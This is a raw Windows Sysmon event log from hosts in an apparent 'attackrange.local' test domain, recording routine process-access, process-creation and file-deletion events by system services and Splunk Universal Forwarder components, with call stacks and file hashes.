08:10:51.444{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055654Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:51.444{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055653Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:51.444{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055652Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:51.444{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055651Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:51.444{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F90B-60EB-147E-00000000CF01}8648C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001055650Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:51.444{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F90B-60EB-147E-00000000CF01}8648C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001055649Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:51.420{466BC892-F90B-60EB-147E-00000000CF01}8648C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001055648Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:51.257{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0A17F131E477E34E8B428A9A744AB804,SHA256=A2398C268027DBDE23301694485B028EFEE9C7281556A055AB0E6FBBC92259A2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055647Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:51.257{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C91343BCA0652712331093A64254542C,SHA256=7AD834BD2CC7F4765C1203DC5D03081339C8B1B83F9A34D38F7F4967D82EA37D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810939Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:52.781{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8BE94BF493D83E4F928E7C3E47855E66,SHA256=55764AD3BF52B210C6B04C608C3E2711FE825B2AEF1E6C8AA665825B98DFACAE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055676Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:52.961{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F90C-60EB-167E-00000000CF01}7396C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055675Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:52.961{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055674Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:52.961{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055673Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:52.961{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F90C-60EB-167E-00000000CF01}7396C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001055672Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:52.961{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055671Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:52.961{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055670Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:52.961{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F90C-60EB-167E-00000000CF01}7396C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001055669Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:52.946{466BC892-F90C-60EB-167E-00000000CF01}7396C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001055668Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:52.538{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=95D3E6F96BFF2DD94CAE581EFAEC5F91,SHA256=68F3AF03FDCDE51876B4E5E771BDB1585F604CDC239FA420CA1567097C5A4C21,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055667Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:52.472{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0A17F131E477E34E8B428A9A744AB804,SHA256=A2398C268027DBDE23301694485B028EFEE9C7281556A055AB0E6FBBC92259A2,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055666Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:52.325{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F90C-60EB-157E-00000000CF01}4796C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055665Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:52.325{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055664Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:52.325{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055663Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:52.325{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055662Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:52.325{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055661Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:52.325{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F90C-60EB-157E-00000000CF01}4796C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001055660Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:52.325{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F90C-60EB-157E-00000000CF01}4796C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001055659Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:52.320{466BC892-F90C-60EB-157E-00000000CF01}4796C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000810940Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:53.781{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6B81ACEADF868A196FDEA45104859CBB,SHA256=2D076083F03A1F6C139CA0A67AC92F68684F0B5B89D9ADDFB57FDDFF2B294F53,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055688Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:53.962{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=C5EC2BEB8B9F24362E5A8363BC1B526D,SHA256=288D88ACD00F9DF9B38268EED6E0F7492EC3D6F3BC612C4A320A6F3C3E90896D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055687Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:53.778{466BC892-F90D-60EB-177E-00000000CF01}53368612C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001055686Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:53.561{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program 